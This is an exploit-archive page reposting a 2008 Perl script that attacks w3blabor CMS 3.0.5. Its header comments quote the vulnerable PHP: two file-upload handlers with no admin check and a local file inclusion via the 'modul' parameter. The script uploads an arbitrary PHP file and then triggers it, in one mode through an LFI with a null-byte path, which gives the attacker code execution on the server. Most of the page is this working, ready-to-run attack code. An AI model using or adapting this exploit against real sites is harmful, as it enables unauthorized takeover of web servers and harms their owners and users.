首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
w3blabor CMS 3.0.5 Arbitrary File Upload & LFI Exploit
来源:http://www.w3blaborcms.de 作者:DNX 发布时间:2008-12-08  
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use Getopt::Long;

#                           \#'#/
#                           (-.-)
#    ------------------oOO---(_)---OOo-----------------
#    |          __             __                     |
#    |    _____/ /_____ ______/ /_  __  ______ ______ |
#    |   / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
#    |  (__  ) /_/ /_/ / /  / /_/ / /_/ / /_/ (__  )  |
#    | /____/\__/\__,_/_/  /_.___/\__,_/\__, /____/   |
#    | Security Research Division      /____/ 2oo8    |
#    --------------------------------------------------
#    |   w3blabor v3.0.5 Arbitrary File Upload & LFI  |
#    --------------------------------------------------
# [!] Discovered.: DNX
# [!] Vendor.....: http://www.w3blaborcms.de
# [!] Detected...: 17.10.2008
# [!] Reported...: 29.11.2008
# [!] Response...: xx.xx.2008
#
# [!] Background.: Sicher! Schnell! Einfach!
#                  Das CMS wurde durch diverse Abfragen und Konfigurationen gegen Hackangriffe
#                  abgesichert. Auch arbeitet es sehr stabil und kommuniziert schnell mit der
#                  angebundenen Datenbank. Die Verwaltung gestaltet sich als besonders einfach im
#                  Gegensatz zu vielen anderen Content Management Systemen - Und genau das macht
#                  es zu etwas Besonderem!
#
# [!] Bug Upload.: in admin/inc/media.inc.php near line 71 (no check on admin privileges)
#
#                  71: if (isset($_GET['action']) && $_GET['action'] == "upload") {
#
#                  80:          $dir = "../../includes/media";
#                  81:          $file = $_FILES['datei']['name'];
#
#                  92:          $file = strtolower($file);
#                  93:
#                  94:          move_uploaded_file($_FILES['datei']['tmp_name'],$dir."/".$file);
#                  95:          @chmod("".$dir.""/"".$file."", 0777);
#
# [!] Bug Upload.: in admin/inc/meinlogo.inc.php near line 45 (no check on admin privileges)
#
#                  45: $neueslogo = $_FILES['neueslogo']['name'];
#                  46: $logopfad = "../../includes/upload/".$settings['page_logo']."";
#                  47:
#                  48: $endung = substr ($_FILES['neueslogo']['name'], -3);
#                  49:
#                  50: if (($endung=="jpg") || ($endung=="peg") || ($endung=="png") || ($endung=="gif") || ($endung=="JPG") || ($endung=="PEG") || ($endung=="PNG") || ($endung=="GIF")) {
#
#                  54: move_uploaded_file($_FILES['neueslogo']['tmp_name'],"../../includes/upload/".$neueslogo);
#
# [!] Bug LFI....: $_GET['modul'] in admin/inc/modul.inc.php near line 47 (requires magic_quotes_gpc = Off)
#
#                  43: $modulfile = "../../includes/module/".$_GET['modul']."/".$_GET['datei'].".inc.php";
#                  44:
#                  45: if (file_exists($modulfile)) {
#                  46:
#                  47:         include "../../includes/module/".$_GET['modul']."/".$_GET['datei'].".inc.php";
#
# [!] Solution...: no update from vendor till now
#

if(!$ARGV[4])
{
  print "\n                        \\#'#/                    ";
  print "\n                        (-.-)                     ";
  print "\n   ----------------oOO---(_)---OOo----------------";
  print "\n   | w3blabor v3.0.5 Arbitrary File Upload & LFI |";
  print "\n   |                coded by DNX                 |";
  print "\n   -----------------------------------------------";
  print "\n[!] Usage: perl w3blabor.pl [Host] [Path] <Options>";
  print "\n[!] Example: perl w3blabor.pl 127.0.0.1 /w3blabor/ -2 -f s.jpg";
  print "\n[!] Targets:";
  print "\n       -1              Upload over media.inc.php";
  print "\n       -2              Upload over meinlogo.inc.php";
  print "\n[!] Options:";
  print "\n[!]    -f [filename]   Path to local file with php code";
  print "\n       -p [ip:port]    Proxy support";
  print "\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $file    = "";
my %options = ();
GetOptions(\%options, "1", "2", "f=s", "p=s");

if($options{"f"})
{
  $file = $options{"f"};
  if(!-e $file)
  {
    print "[!] Failed, local file doesn't exist.\n";
    exit;
  }
}
else
{
  print "[!] Failed, see usage.\n";
  exit;
}

print "[!] Exploiting...\n";

use_bug($host, $path, $file);

print "[!] Exploit done\n";

sub use_bug
{
  my $host = shift;
  my $path = shift;
  my $file = shift;
 
  my $ua       = LWP::UserAgent->new();
  my $url      = "";
  my $url2     = "";
  my $req      = "";
  $file        =~ /.*[\/|\\](.*)/;
  my $filename = $1;
 
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
 
  if($options{"1"})
  {
    $url = 'http://'.$host.$path.'admin/inc/media.inc.php?action=upload';
    $url2 = 'http://'.$host.$path.'includes/media/'.$filename;
    $req = POST $url, Content_Type => 'form-data', Content => [ datei => [$file], ];
  }
  if($options{"2"})
  {
    if($file =~ m/.*\.jpg|peg|png|gif/i)
    {
      $url = 'http://'.$host.$path.'admin/inc/meinlogo.inc.php?action=upload';
      $url2 = 'http://'.$host.$path.'admin/inc/modul.inc.php?modul=../upload/'.$filename.'%00';
      $req = POST $url, Content_Type => 'form-data', Content => [ neueslogo => [$file], ];
    }
    else
    {
      print "[!] Failed, rename your local file to .jpg\n";
      exit;
    }
  }
 
  $ua->request($req);
  my $res = $ua->get($url2);
  if($res->is_success)
  {
    print "[!] File uploaded\n";
    print "[!] Check your file @ ".$url2."\n";
  }
  else
  {
    print "[!] Failed\n";
  } 
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PayPal eStore Admin Password C
·Bonza Cart <= 1.10 Admin Passw
·MG2 0.5.1 (filename) Remote Co
·DL PayCart <= 1.34 Admin Passw
·SIU Guarani Multiple Remote Vu
·IPNPro3 <= 1.44 Admin Password
·phpMyAdmin 3.1.0 (XSRF) SQL In
·DesignWorks Professional 4.3.1
·Simple Directory Listing 2 Cro
·XAMPP 1.6.8 (XSRF) Change Admi
·Visagesoft eXPert PDF EditorX
·phpBB 3 (Mod Tag Board <= 4) R
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved